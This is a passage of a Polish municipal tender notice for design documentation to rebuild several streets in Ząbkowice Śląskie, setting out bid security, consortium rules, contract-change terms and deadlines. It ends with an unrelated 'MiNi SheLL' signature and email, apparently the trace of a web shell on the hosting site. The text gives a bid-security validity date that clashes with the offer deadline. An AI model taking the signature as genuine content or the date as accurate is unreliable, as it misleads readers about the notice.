przygotowanie oferty niezależnie od innego Wykonawcy należącego do<br/>tej samej grupy kapitałowej – zgodnie z załącznikiem nr 3 do SWZ;<br/>4) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej (w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp.) sporządzonych nie wcześniej<br/>niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) Oferta - na ofertę składa się:<br/>a) formularz ofertowy – załącznik nr 1 do SWZ.<br/>Do przygotowania oferty Zamawiający zaleca wykorzystanie załącznika nr 1 do SWZ. W treści<br/>oferty należy zamieścić informacje zawarte w formularzu ofertowym (załączniku nr 1 do SWZ).<br/>Szczegółowy sposób przygotowania i złożenia oferty zawarto w części X SWZ.<br/>2) Pełnomocnictwo w oryginale w postaci elektronicznej, bądź cyfrowe jego odwzorowanie,<br/>opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem<br/>osobistym (e-dowód) MOCODAWCY, o ile ofertę składa pełnomocnik. Zamawiający dopuszcza<br/>również złożenie kopii pełnomocnictwa sporządzonego przez notariusza w trybie art. 97 § 2<br/>ustawy z dnia 14 lutego 1991 r. Prawo o notariacie (Dz.U. z 2020 r. poz. 1192 tj. ze zm.) tj. w<br/>postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym. Elektroniczna kopia<br/>pełnomocnictwa nie może być uwierzytelniona przez upełnomocnionego.<br/>3) Dokument potwierdzający wniesienie wadium zgodnie z postanowieniami części VIII SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający żąda od Wykonawców wniesienia wadium w wysokości: 2.000,00 zł (słownie:<br/>dwa tysiące złotych 00/100).<br/>2. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia<br/>upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2<br/>i 3 oraz ust. 2 ustawy Pzp.<br/>3. Okres ważności wadium:<br/>Wykonawca zabezpiecza ofertę wadium na okres do dnia: 25.03.2022r.<br/>Bieg terminu rozpoczyna się wraz z dniem wskazanym, jako termin składania ofert. Przedłużenie<br/>terminu związania ofertą jest dopuszczalne tylko z jednoczesnym przedłużeniem okresu<br/>ważności wadium albo, jeżeli nie jest to możliwe, z wniesieniem nowego wadium na przedłużony<br/>okres związania ofertą.<br/>4. Wadium może być wnoszone według wyboru Wykonawcy w jednej lub kilku następujących<br/>formach:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z<br/>dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z<br/>2020r. poz. 299 tj.).<br/>5. Wadium należy wnieść przed upływem terminu składania ofert w następujący sposób:<br/>1) w przypadku wadium wnoszonego w pieniądzu:<br/>a) Wykonawca wpłaca wadium w wymaganej kwocie przelewem na rachunek bankowy Urząd<br/>Miejski w Ząbkowicach Śląskich:<br/>Bank Spółdzielczy nr 04 9533 0004 2001 0009 8645 0005<br/>jako termin wniesienia wadium przyjęty zostaje termin uznania kwoty na rachunku<br/>Zamawiającego,<br/>b) zaleca się w tytule przelewu wpisać „wadium na zabezpieczenie oferty Wykonawcy ………….,<br/>dotyczącej zamówienia pn. „Wykonanie dokumentacji przebudowy ulic Aliantów, Długiej,<br/>Strażackiej, Bohaterów Getta, Batalionów Chłopskich w Ząbkowicach Śląskich” 2) w przypadku gwarancji i poręczeń:<br/>a) wadium wnoszone jest przy użyciu środków komunikacji elektronicznej. Wadium musi być -<br/>pod rygorem nieważności - wniesione w ORYGINALE w postaci elektronicznej;<br/>b) wadium należy dołączyć do oferty wraz z plikami stanowiącymi ofertę.<br/>c) dokument powinien określać:<br/>- Zamawiającego – poprzez wskazanie Zamawiającego, jako podmiotu uprawnionego do<br/>wykonywania uprawnień wynikających z gwarancji,<br/>- charakter gwarancji – poprzez stwierdzenie, że określona kwota pieniężna stanowi<br/>zabezpieczenie niezbędne do wzięcia udziału przez Wykonawcę X w konkretnym postępowaniu<br/>o udzielenie określonego zamówienia publicznego (podać nazwę),<br/>- bezwarunkowe, nieodwołalne na każde pisemne żądanie zgłoszone przez Zamawiającego w<br/>terminie związania ofertą, zobowiązanie gwaranta/poręczyciela do wypłaty Zamawiającemu<br/>pełnej kwoty wadium w okolicznościach określonych w art. 98 ust. 6 ustawy Pzp,<br/>- termin obowiązywania gwarancji, poręczenia nie krótszy niż termin związania ofertą;<br/>d) Zamawiający ZALECA (jedynie), aby dokument wskazywał również adres e-mailowy<br/>gwaranta/poręczyciela lub adres skrzynki ePUAP (jeśli go gwarant/poręczyciel posiada). <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia ( konsorcjum) - art. 58 ust.1<br/>ustawy Pzp. W takim przypadku Wykonawcy ponoszą solidarną odpowiedzialność za wykonanie<br/>umowy. W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia<br/>umowy w sprawie zamówienia publicznego, oraz załączają do oferty pełnomocnictwo<br/>(przygotowanie zgodnie z zapisami ust. 9 pkt 2 części VI SWZ) do reprezentowania<br/>Wykonawców w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i<br/>zawarcia umowy w sprawie zamówienia publicznego. Szczegółowy sposób spełniania warunków<br/>udziału w postępowaniu dla podmiotów wspólnie ubiegających się o udzielenie zamówienia<br/>został określony w części V SWZ „warunki udziału w postępowaniu”. Korespondencja będzie<br/>prowadzona z pełnomocnikiem (liderem).<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, zgodnie z dyspozycją art. 117<br/>ust. 4 ustawy Pzp., dołączają do oferty oświadczenie, z którego wynika, które czynności lub<br/>dostawy wykonają poszczególni wykonawcy – zgodnie z załącznikiem nr 7 do SWZ.<br/>Jeżeli oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia zostanie<br/>wybrana jako najkorzystniejsza, przed podpisaniem umowy Zamawiający może żądać<br/>przedłożenia umowy współpracy (np. umowa konsorcjum), zawierającą, co najmniej:<br/>- oświadczenie o solidarnej odpowiedzialności wszystkich partnerów wobec Zamawiającego za<br/>wykonanie umowy, a także w razie nie wykonania lub nienależytego wykonania obowiązków<br/>określonych umową zawartą z Zamawiającym.<br/>- wyznaczenie jednego z partnerów konsorcjum jako partnera kierującego (lidera), który będzie<br/>upoważniony do zaciągania zobowiązań, otrzymywania poleceń oraz instrukcji dla i w imieniu<br/>każdego, jak też dla wszystkich partnerów. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zakazuje się zmian postanowień zawartej umowy, chyba, że zmiany zostały wprowadzone na<br/>podstawie art. 455 ustawy Pzp.<br/>2. Wszelkie zmiany niniejszej umowy mogą być dokonane za zgodą obu stron, wyrażaną w<br/>formie pisemnej pod rygorem nieważności.<br/>3. Dopuszcza się następujące zmiany umowy:<br/>1) zmiany stawki podatku VAT, na skutek zmian w przepisach prawnych, urzędowa zmiana<br/>podatku VAT, w takim wypadku zmianie ulegnie cena brutto, zaś cena netto pozostanie bez<br/>zmian.<br/>2) zmiany terminu umowy w przypadku:<br/>a) przedłużenia się terminu uzgodnień i pozwoleń zewnętrznych przez podmioty do tego<br/>upoważnione,<br/>b) wystąpienia okoliczności nie zawinionych przez strony, których nie można było wcześniej<br/>przewidzieć,<br/>c) zaistnienia innej, niemożliwej do przewidzenia w momencie zawarcia umowy okoliczności<br/>prawnej, ekonomicznej, technicznej, organizacyjnej lub innej za którą żadna ze stron nie ponosi<br/>odpowiedzialności, skutkującej brakiem możliwości należytego wykonania umowy, zgodnie ze<br/>specyfikacją warunków zamówienia,<br/>d) zmiany spowodowane wystąpieniem COVID-19, związane w szczególności z:<br/>- nieobecnością pracowników lub osób świadczących pracę za wynagrodzeniem na innej<br/>podstawie niż stosunek pracy, które uczestniczą lub mogłyby uczestniczyć w realizacji<br/>zamówienia,<br/>- decyzją wydaną przez Głównego Inspektora Sanitarnego lub działającego z jego upoważnienia<br/>Państwowego Wojewódzkiego Inspektora Sanitarnego, w związku z przeciwdziałaniem COVID-<br/>19 nakładającym na wykonawcę obowiązek podjęcia określonych czynności zapobiegawczych<br/>lub kontrolnych,<br/>- poleceniem wydanych przez wojewodę lub decyzji wydanych przez Prezesa Rady Ministrów<br/>związanych z przeciwdziałaniem COVID-19,<br/>- okolicznościami o których mowa wyżej, w zakresie w jakim dotyczą one Podwykonawcy lub<br/>dalszego Podwykonawcy,<br/>3) w przypadku wystąpienia którejkolwiek z okoliczności wymienionych w ppkt.2. lit. a-d termin<br/>umowy może ulec zmianie o czas niezbędny do zakończenia wykonania jej przedmiotu w<br/>sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-08-05 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">1. Wykonawca składa OFERTĘ WYŁĄCZNIE za pośrednictwem Platformy dostępnej pod adresem: https://zabkowiceslaskie.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-08-05 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-09-03</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.	PODZIAŁ ZAMÓWIENIA NA CZĘŚCI: <br/><br/>Zamówienie nie zostało podzielone na części z następujących względów: <br/>Zamówienie obejmuje wykonanie dokumentacji przebudowy powiązanych ze sobą ulic: Aliantów, Długiej, Strażackiej, Bohaterów Getta, Batalionów Chłopskich, Placu Marii Skłodowskiej-Curie, i Słowackiego położonych w północno zachodniej staromiejskiej części miasta Ząbkowice Śląskie, Projektant zobowiązany będzie do opracowania kompleksowego systemu odprowadzenia wód opadowych z przedmiotowych ulic do potoku Jadkowa. Powiązanie niwelety nawierzchni jezdni , skrzyżowań oraz rzędnych posadowienia projektowanej kanalizacji deszczowej poszczególnych ulic uniemożliwia zlecenie wykonania przedmiotowej dokumentacji osobno dla każdej ulicy. <br/>2.	INFORMACJA O MOŻLIWOŚCI UDZIAŁU W POSTĘOWANIU PODMIOTU, <br/>O KTÓRYM MOWA W ART. 85 UST. 2 USTAWY PZP.<br/><br/>Zamawiający informuje, że umożliwia wszystkim potencjalnym Wykonawcom zapoznanie się z pełną dokumentacją dotyczącą realizacji niniejszego zadania w stopniu równym, w terminie co najmniej określonym art. 283 ustawy Pzp. W przypadku udziału w niniejszym postępowaniu podmiotu, o którym mowa w art. 85 ust. 2 ustawy Pzp., ciężar dowodu braku zakłócenia konkurencji leży po stronie Wykonawcy, który złożył ofertę.

Creat By MiNi SheLL
Email: jattceo@gmail.com